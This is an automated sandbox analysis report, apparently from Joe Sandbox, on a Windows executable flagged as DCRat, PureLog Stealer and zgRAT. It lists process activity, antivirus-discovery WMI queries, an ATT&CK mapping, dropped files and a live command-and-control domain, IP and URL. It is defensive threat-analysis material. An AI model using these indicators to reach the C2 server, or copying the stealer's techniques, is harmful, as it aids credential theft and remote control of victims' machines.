Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\axnJvpyQnMRKSw.exe "C:\Recovery\axnJvpyQnMRKSw.exe"
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Queries volume information: C:\Users\user\Desktop\FuWRu2Mg82.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Recovery\axnJvpyQnMRKSw.exe VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: axnJvpyQnMRKSw.exe, 00000005.00000002.1863939055.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000005.00000002.1918500382.000000001C5A8000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.2002706193.000000001C8B0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2125366803.000000001CEE2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B770000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2233548129.000000001B78A000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2365797037.000000001CCB2000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2471536940.000000001C8F0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2634273457.000000001B7E0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2773962075.000000001C7C0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\axnJvpyQnMRKSw.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1708412433.0000000012D13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FuWRu2Mg82.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: axnJvpyQnMRKSw.exe PID: 7620, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: FuWRu2Mg82.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FuWRu2Mg82.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653544673.0000000000222000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\axnJvpyQnMRKSw.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Web\ApplicationFrameHost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: FuWRu2Mg82.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FuWRu2Mg82.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\axnJvpyQnMRKSw.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Web\ApplicationFrameHost.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1708412433.0000000012D13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FuWRu2Mg82.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: axnJvpyQnMRKSw.exe PID: 7620, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: FuWRu2Mg82.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FuWRu2Mg82.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1653544673.0000000000222000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\axnJvpyQnMRKSw.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Web\ApplicationFrameHost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: FuWRu2Mg82.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FuWRu2Mg82.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\axnJvpyQnMRKSw.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Web\ApplicationFrameHost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	11 Process Injection	31 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
FuWRu2Mg82.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
FuWRu2Mg82.exe	100%	Avira	HEUR/AGEN.1323342
FuWRu2Mg82.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\BpwztmWB.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\Desktop\DOypUrKc.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\CQWhyrvh.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\DHkzZdjU.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\axnJvpyQnMRKSw.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\ENiSZQDC.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\DZeKnCHE.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BpwztmWB.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\DOypUrKc.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\DHkzZdjU.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CpJqgrwA.log	100%	Joe Sandbox ML
C:\Recovery\axnJvpyQnMRKSw.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ENiSZQDC.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\DZeKnCHE.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\DzuiDjow.log	100%	Joe Sandbox ML
C:\Recovery\axnJvpyQnMRKSw.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BBFiueAC.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\BNVQohxV.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\BUFrAOsF.log	24%	ReversingLabs
C:\Users\user\Desktop\BXrbSTCJ.log	17%	ReversingLabs
C:\Users\user\Desktop\BpwztmWB.log	8%	ReversingLabs
C:\Users\user\Desktop\CQWhyrvh.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CdAHeASz.log	24%	ReversingLabs
C:\Users\user\Desktop\ChaYBIVv.log	8%	ReversingLabs
C:\Users\user\Desktop\CpJqgrwA.log	8%	ReversingLabs
C:\Users\user\Desktop\DHkzZdjU.log	8%	ReversingLabs
C:\Users\user\Desktop\DOypUrKc.log	8%	ReversingLabs
C:\Users\user\Desktop\DVKqIFYb.log	17%	ReversingLabs
C:\Users\user\Desktop\DZeKnCHE.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DzuiDjow.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ENiSZQDC.log	25%	ReversingLabs
C:\Users\user\Desktop\EbCAWgmB.log	17%	ReversingLabs
C:\Users\user\Desktop\EihSxCbb.log	21%	ReversingLabs
C:\Users\user\Desktop\EoSiPjjU.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EvoHLreS.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\FVlaiPXZ.log	8%	ReversingLabs
C:\Users\user\Desktop\FXwZeocX.log	8%	ReversingLabs
C:\Users\user\Desktop\FfPYKNJo.log	8%	ReversingLabs
C:\Users\user\Desktop\FzdFbFVV.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GBhRZStr.log	8%	ReversingLabs
C:\Users\user\Desktop\GLAhPCYV.log	8%	ReversingLabs
C:\Users\user\Desktop\GPaymKbQ.log	17%	ReversingLabs
C:\Users\user\Desktop\GTNiEPlU.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GhhRBgVS.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HQSFHwhn.log	25%	ReversingLabs
C:\Users\user\Desktop\HQUAuzHx.log	8%	ReversingLabs
C:\Users\user\Desktop\HiZYWSbq.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HplZKgpp.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HxbpgajN.log	17%	ReversingLabs
C:\Users\user\Desktop\INvIQzWs.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\IUYfDSlJ.log	17%	ReversingLabs
C:\Users\user\Desktop\IimQJXBp.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IjUzWPZN.log	8%	ReversingLabs
C:\Users\user\Desktop\IlfySofL.log	24%	ReversingLabs
C:\Users\user\Desktop\IuCyCayI.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\JEszLdwN.log	5%	ReversingLabs
C:\Users\user\Desktop\JGbOwXPR.log	8%	ReversingLabs
C:\Users\user\Desktop\JOnPlldQ.log	21%	ReversingLabs
C:\Users\user\Desktop\JPUzzdBp.log	8%	ReversingLabs
C:\Users\user\Desktop\JiGGnouG.log	8%	ReversingLabs
C:\Users\user\Desktop\KGLrCwIr.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KPopdtuG.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KozQBPIf.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\LQfwyfBd.log	21%	ReversingLabs
C:\Users\user\Desktop\LTSgQlLh.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\MLpHgvqI.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\MQtollac.log	8%	ReversingLabs
C:\Users\user\Desktop\MwRFEUPK.log	21%	ReversingLabs
C:\Users\user\Desktop\NJvfkcmc.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NWmyzMoB.log	8%	ReversingLabs
C:\Users\user\Desktop\OKWQGJri.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\OwBiJsIk.log	8%	ReversingLabs
C:\Users\user\Desktop\PhxVLhaD.log	21%	ReversingLabs
C:\Users\user\Desktop\PpJWzvoC.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PqqGNnMb.log	8%	ReversingLabs
C:\Users\user\Desktop\QkZgZWxz.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\QynQebMf.log	8%	ReversingLabs
C:\Users\user\Desktop\RAMHNFsb.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RDLnOhqQ.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\RQVXPZTR.log	21%	ReversingLabs
C:\Users\user\Desktop\RYEpuIuX.log	12%	ReversingLabs
C:\Users\user\Desktop\RzlVrZnV.log	8%	ReversingLabs
C:\Users\user\Desktop\SKDxcIEq.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\SmsYQpId.log	24%	ReversingLabs
C:\Users\user\Desktop\SoXNqeHs.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\SwGfVNiy.log	5%	ReversingLabs
C:\Users\user\Desktop\SwMdNZCQ.log	21%	ReversingLabs
C:\Users\user\Desktop\SyoPiFGW.log	8%	ReversingLabs
C:\Users\user\Desktop\TYnMSebw.log	12%	ReversingLabs
C:\Users\user\Desktop\TpEwEWgR.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
114936cm.nyashcrack.top	37.44.238.250	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FuWRu2Mg82.exe, 00000000.00000002.1700201126.0000000003341000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.000000000321B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.0000000003771000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003685000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://114936cm.nyashcrack.top/	axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://114936cm.nyashcrack.top	axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.000000000365E000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.000000000321B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.0000000003493000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.000000000310B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.0000000003771000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.000000000399E000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003685000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003840000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000003198000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000038C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	114936cm.nyashcrack.top	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545737
Start date and time:	2024-10-30 22:31:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
